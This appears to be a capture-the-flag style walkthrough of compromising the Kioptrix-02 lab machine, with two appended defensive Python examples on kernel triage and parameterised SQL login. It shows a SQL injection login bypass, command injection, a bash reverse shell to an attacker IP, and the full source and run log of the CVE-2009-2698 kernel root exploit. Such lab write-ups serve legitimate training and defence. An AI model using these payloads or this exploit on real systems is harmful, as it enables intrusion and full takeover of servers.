+ http://192.168.216.148/manual/ko/misc/index.html (CODE:200|SIZE:5491)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ko/mod/ ----
+ http://192.168.216.148/manual/ko/mod/index.html (CODE:200|SIZE:12795)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ko/programs/ ----
+ http://192.168.216.148/manual/ko/programs/index.html (CODE:200|SIZE:4543)                         
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ko/ssl/ ----
+ http://192.168.216.148/manual/ko/ssl/index.html (CODE:200|SIZE:3988)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ko/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ru/developer/ ----
+ http://192.168.216.148/manual/ru/developer/index.html (CODE:200|SIZE:4770)                        
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ru/faq/ ----
+ http://192.168.216.148/manual/ru/faq/index.html (CODE:200|SIZE:3564)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ru/howto/ ----
+ http://192.168.216.148/manual/ru/howto/index.html (CODE:200|SIZE:5685)                            
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ru/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ru/misc/ ----
+ http://192.168.216.148/manual/ru/misc/index.html (CODE:200|SIZE:5491)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ru/mod/ ----
+ http://192.168.216.148/manual/ru/mod/index.html (CODE:200|SIZE:13437)                             
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ru/programs/ ----
+ http://192.168.216.148/manual/ru/programs/index.html (CODE:200|SIZE:5016)                         
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ru/ssl/ ----
+ http://192.168.216.148/manual/ru/ssl/index.html (CODE:200|SIZE:3988)                              
                                                                                                    
---- Entering directory: http://192.168.216.148/manual/ru/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sat Apr 18 21:21:59 2020
DOWNLOADED: 262884 - FOUND: 102

There is nothing of interest in the manual folder; on inspection it contains no more than the Apache Web Server documentation. The file worth examining is index.php, a login form, as shown in Figure 1 below:

Figure 1. Login form on Kioptrix-02

Stage Two: Mapping the Attack Surface

Based on the information gathered in the previous stage, the potential attacks (see Figure 2) can be mapped onto three services: SSH, HTTP and ipp. For the SSH service no potential for Remote Code Execution (RCE) was found, since no Buffer Overflow vulnerability is known for OpenSSH version 3.9p1; the same holds for the ipp service (CUPS 1.1). A brute-force attack on the SSH service is also not feasible, because no valid user account was found.

The remaining valid attack vector is therefore an injection vulnerability, namely SQL Injection. After several attempts, entering admin' or 1=1# in the Username field turned out to bypass the login form on the Kioptrix-02 machine, as the following two figures show:

Figure 3. Entering admin' or 1=1# to verify the attack opportunity
Figure 4. The verification result proves that the Username field is a potential attack target

Analysing the form further, it turns out that it can execute several operating system commands at once when they are chained with the ";" symbol (semicolon). This is a feature of the Linux operating system's shell. It can be seen in the following two figures:

Figure 5. Using the commands ping 127.0.0.1 and uname -a in the form
Figure 6. Result of executing the ping and uname commands

Stage Three: Exploitation and Post-Exploitation

The analysis in the previous stage showed that the Username field in index.php carries a valid vulnerability with great potential as the entry point for taking over the whole system. The Exploitation and Post-Exploitation stage therefore focuses the attack on that vulnerability.

The first attack step is to obtain a limited shell, by making the Kioptrix-02 machine connect back to the attacker using the reverse shell technique. The reverse shell command entered in the form is chained into one command sequence together with the ping command: 127.0.0.1;bash -i >& /dev/tcp/192.168.216.149/4444 0>&1. On the attacker's side, netcat is used to listen on port 4444 (see Figure 7).

Figure 7. Issuing the reverse shell command
Figure 8. Limited shell on the attacker's side using netcat

The next step is to escalate privileges to root. For that, we gather several important pieces of information. The most important is the operating system version, in order to see whether kernel exploitation is an option. Using the commands uname -a and lsb_release -a, the CentOS version in use is identified as 4.5.

Research shows a Buffer Overflow vulnerability affecting CentOS version 4.5. This kernel vulnerability was discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team and is tracked as CVE-2009-2698. The exploit file is as follows:

/*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** Thankful to them.
**
** --
** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
** sh-3.1# id
** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
** sh-3.1#
** --
** exploit by <p0c73n1(at)gmail(dot)com>.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>

unsigned int uid, gid;
void get_root_uid(unsigned *task)
{
	unsigned *addr=task;
	while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
		addr++;
	}
	addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
	addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
	return;
}
void exploit();
void kernel_code()
{
	asm("exploit:\n"
		"push %eax\n"
		"movl $0xfffff000,%eax\n"
		"andl %esp,%eax\n"
		"pushl (%eax)\n"
		"call get_root_uid\n"
		"addl $4,%esp\n"
		"popl %eax\n");
	return;
}
void *kernel=kernel_code;

int main(int argc, char **argv)
{
	int fd=0;
	char buf[1024];
	struct sockaddr x0x;
	void *zero_page;

	uid=getuid();
	gid=getgid();
	if(uid==0){
		fprintf(stderr,"[-] check ur uid\n");
		return -1;
	}
	if(personality(0xffffffff)==PER_SVR4){
		if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
			perror("[-] mprotect()");
			return -1;
		}
	}
	else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
			perror("[-] mmap()");
			return -1;
	}
	*(unsigned long *)0x0=0x90909090;
	*(char *)0x00000004=0x90; /* +1 */
	*(char *)0x00000005=0xff;
	*(char *)0x00000006=0x25;
	*(unsigned long *)0x00000007=(unsigned long)&kernel;
	*(char *)0x0000000b=0xc3;

	if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
		perror("[-] socket()");
		return -1;
	}
	x0x.sa_family=AF_UNSPEC;
	memset(x0x.sa_data,0x82,14);
	memset((char *)buf,0,sizeof(buf));
	sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
	sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
	if(getuid()==uid){
		printf("[-] exploit failed, try again\n");
		return -1;
	}
	close(fd);
	execl("/bin/sh","sh","-i",NULL);
	return 0;
}

/* eoc */

// milw0rm.com [2009-08-31]
// https://raw.githubusercontent.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/master/2009/CVE-2009-2698/CVE-2009-2698.c

The attacker then downloads the file and transfers it to the Kioptrix-02 machine, where it is compiled with gcc. The result is that the attacker gains full control of the machine, having escalated privileges to root (administrator) on that server. The sequence of commands is as follows.

root@kali2:~/Documents# wget https://raw.githubusercontent.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/master/2009/CVE-2009-2698/CVE-2009-2698.c
--2020-04-18 20:36:05--  https://raw.githubusercontent.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/master/2009/CVE-2009-2698/CVE-2009-2698.c
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.8.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.8.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2645 (2.6K) [text/plain]
Saving to: ‘CVE-2009-2698.c’

CVE-2009-2698.c           100%[==================================>]   2.58K  --.-KB/s    in 0s      

2020-04-18 20:36:05 (71.4 MB/s) - ‘CVE-2009-2698.c’ saved [2645/2645]

root@kali2:~/Documents# 
root@kali2:~/Documents# 
root@kali2:~/Documents# python -m SimpleHTTPServer 9999
Serving HTTP on 0.0.0.0 port 9999 ...
192.168.216.148 - - [18/Apr/2020 20:37:57] "GET /CVE-2009-2698.c HTTP/1.0" 200 -


bash-3.00$ cd /tmp
bash-3.00$ 
bash-3.00$ wget http://192.168.216.149:9999/CVE-2009-2698.c
--10:37:41--  http://192.168.216.149:9999/CVE-2009-2698.c
           => `CVE-2009-2698.c'
Connecting to 192.168.216.149:9999... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [text/plain]

    0K ..                                                    100%  360.35 MB/s

10:37:41 (360.35 MB/s) - `CVE-2009-2698.c' saved [2645/2645]

bash-3.00$ ls -l
total 4
-rw-r--r--  1 apache apache 2645 Apr 18 23:36 CVE-2009-2698.c
bash-3.00$ 
bash-3.00$ gcc -o privKioptrix02 CVE-2009-2698.c
bash-3.00$ ls -l
total 12
-rw-r--r--  1 apache apache 2645 Apr 18 23:36 CVE-2009-2698.c
-rwxr-xr-x  1 apache apache 6941 Apr 19 10:38 privKioptrix02
bash-3.00$ chmod +x privKioptrix02
bash-3.00$ ls -l
total 12
-rw-r--r--  1 apache apache 2645 Apr 18 23:36 CVE-2009-2698.c
-rwxr-xr-x  1 apache apache 6941 Apr 19 10:38 privKioptrix02
bash-3.00$   
bash-3.00$ 
bash-3.00$ ./privKioptrix02
sh: no job control in this shell
sh-3.00# 
sh-3.00# ls -l
total 12
-rw-r--r--  1 apache apache 2645 Apr 18 23:36 CVE-2009-2698.c
-rwxr-xr-x  1 apache apache 6941 Apr 19 10:38 privKioptrix02
sh-3.00# ./privKioptrix02
[-] check ur uid
sh-3.00# 
sh-3.00# 
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# 
sh-3.00# cd /root
sh-3.00# ls -l
total 80
-rw-r--r--  1 root root  1168 Oct  7  2009 anaconda-ks.cfg
-rw-r--r--  1 root root 53255 Oct  7  2009 install.log
-rw-r--r--  1 root root  3842 Oct  7  2009 install.log.syslog
sh-3.00#     
sh-3.00# 
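The privilege escalation above works because the running kernel is in the range the exploit header names (Linux 2.6 before 2.6.19) and because the process is allowed to map the zero page. As an added example, not part of the post, here is a triage helper a defender can run against fleet inventory: it parses a `uname -r` release string and reports whether it falls in that range, and it parses the `vm.mmap_min_addr` sysctl, which on kernels that support it stops unprivileged processes from mapping the zero page this class of NULL-dereference exploit relies on. The function names are my own; the release string "2.6.9-55.ELsmp" is the CentOS 4.5 value from the exploit header, and the other sample strings are constructed.

```python
import re
from typing import Optional, Tuple

# Upstream range named in the exploit header: 2.6.x with x < 19.
AFFECTED_FROM = (2, 6, 0)
FIXED_IN = (2, 6, 19)

# Smallest value of vm.mmap_min_addr that still denies a mapping at address 0.
# Distribution defaults are commonly 4096 or 65536 (assumption about defaults,
# the check itself only needs "greater than zero").
PAGE_SIZE = 4096

_KERNEL_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)")
_SYSCTL_RE = re.compile(r"^\s*vm\.mmap_min_addr\s*=\s*(\d+)\s*$")


def parse_kernel_release(release: str) -> Optional[Tuple[int, int, int]]:
    """Extract (major, minor, patch) from a uname -r string such as
    '2.6.9-55.ELsmp' or '2.6.32-754.el6.x86_64'. Returns None if unparseable."""
    m = _KERNEL_RE.match(release.strip())
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def kernel_in_affected_range(release: str) -> bool:
    """True when the upstream version lies in [2.6.0, 2.6.19).
    Caveat: distribution kernels backport fixes without bumping the upstream
    version, so a True here means 'check the vendor errata for this build',
    not 'confirmed vulnerable'."""
    version = parse_kernel_release(release)
    if version is None:
        raise ValueError(f"unrecognised kernel release string: {release!r}")
    return AFFECTED_FROM <= version < FIXED_IN


def mmap_min_addr_blocks_zero_page(sysctl_line: str) -> bool:
    """Parse one line of `sysctl vm.mmap_min_addr` output and report whether
    the setting prevents an unprivileged mapping of page zero."""
    m = _SYSCTL_RE.match(sysctl_line)
    if not m:
        raise ValueError(f"not a vm.mmap_min_addr line: {sysctl_line!r}")
    return int(m.group(1)) >= PAGE_SIZE


def triage(release: str, sysctl_line: str) -> str:
    """Combine both checks into a one-line verdict for an inventory report."""
    in_range = kernel_in_affected_range(release)
    guarded = mmap_min_addr_blocks_zero_page(sysctl_line)
    if not in_range:
        return "kernel outside the affected upstream range"
    if guarded:
        return "kernel in range but mmap_min_addr denies the zero page; verify errata"
    return "kernel in range and zero page mappable; patch or verify errata urgently"


if __name__ == "__main__":
    # Constructed inventory rows: (uname -r, sysctl line).
    samples = [
        ("2.6.9-55.ELsmp", "vm.mmap_min_addr = 0"),
        ("2.6.18-1.2798.fc6", "vm.mmap_min_addr = 65536"),
        ("2.6.32-754.el6.x86_64", "vm.mmap_min_addr = 4096"),
    ]
    for rel, line in samples:
        print(f"{rel:24} -> {triage(rel, line)}")
```

Version-string triage is a starting point, not a verdict: the only reliable answer for an enterprise kernel is the vendor's errata for that exact build, and the sysctl check only applies on kernels new enough to have vm.mmap_min_addr at all.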

Lesson Learned

The Kioptrix-02 story holds a valuable lesson that Electronic System operators should take to heart: beware of SQL Injection attacks. In this case the attacker was able to obtain a limited shell. Then, by taking advantage of an operating system that had not been patched or upgraded to the latest version, the attacker could take over the server completely and carry out any criminal act at will.

To mitigate SQL Injection attacks, the characters used to fill in web application forms must be verified. Never trust any form input; always verify it before passing it on to the database in the backend. Never Trust, Always Verify!
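The login bypass in Stage Two and the mitigation advice above both come down to one design decision: whether user input is spliced into the SQL text or bound as a parameter. As an added example, not code from the Kioptrix-02 post or from the machine's index.php (whose source is not shown), the block below contrasts the two. The unsafe function only renders the query string a concatenating login check would send, so the effect of the quote and the MySQL "#" comment is visible without executing it; the safe path enforces an allow-list on the username (the "verify the characters" advice) and then binds both values as parameters, so they are never parsed as SQL. The table, account, and password are constructed sample data; SQLite stands in for the post's MySQL because the binding behaviour is the same.

```python
import hashlib
import hmac
import os
import re
import sqlite3
from typing import Optional

# Allow-list for usernames: letters, digits, dot, underscore, dash; 1-32 chars.
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,32}$")


def unsafe_query_string(username: str, password: str) -> str:
    """The query a string-concatenating login check would send. With the input
    from the post, MySQL treats everything after '#' as a comment, so the
    password clause is discarded. Shown only to make the failure visible;
    never build queries this way."""
    return ("SELECT * FROM users WHERE username='" + username +
            "' AND password='" + password + "'")


def is_valid_username(username: str) -> bool:
    """First line of defence: reject anything outside the allow-list before it
    reaches the database layer at all."""
    return USERNAME_RE.match(username) is not None


def _hash_password(password: str, salt: bytes) -> bytes:
    # PBKDF2-HMAC-SHA256 with a per-user salt; iteration count is a sample value.
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


def create_user_db() -> sqlite3.Connection:
    """Constructed in-memory users table with one sample account."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB NOT NULL, pw_hash BLOB NOT NULL)"
    )
    salt = os.urandom(16)
    conn.execute(
        "INSERT INTO users (username, salt, pw_hash) VALUES (?, ?, ?)",
        ("admin", salt, _hash_password("correct-horse-sample", salt)),
    )
    conn.commit()
    return conn


def login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised login check. The username is bound with '?', so a quote
    or '#' inside it is just data compared against the column, and the
    password is verified against a salted hash in constant time."""
    if not is_valid_username(username):
        return False
    row: Optional[tuple] = conn.execute(
        "SELECT salt, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    salt, stored_hash = row
    return hmac.compare_digest(_hash_password(password, salt), stored_hash)


if __name__ == "__main__":
    db = create_user_db()
    payload = "admin' or 1=1#"   # the input shown in the post's Figure 3
    print("unsafe query would be:", unsafe_query_string(payload, "x"))
    print("parameterised login with that input:", login(db, payload, "x"))
    print("parameterised login with real credentials:",
          login(db, "admin", "correct-horse-sample"))
```

Parameter binding is the control that closes the hole; the username allow-list and the hashed password are the additional layers that limit what a future mistake can cost.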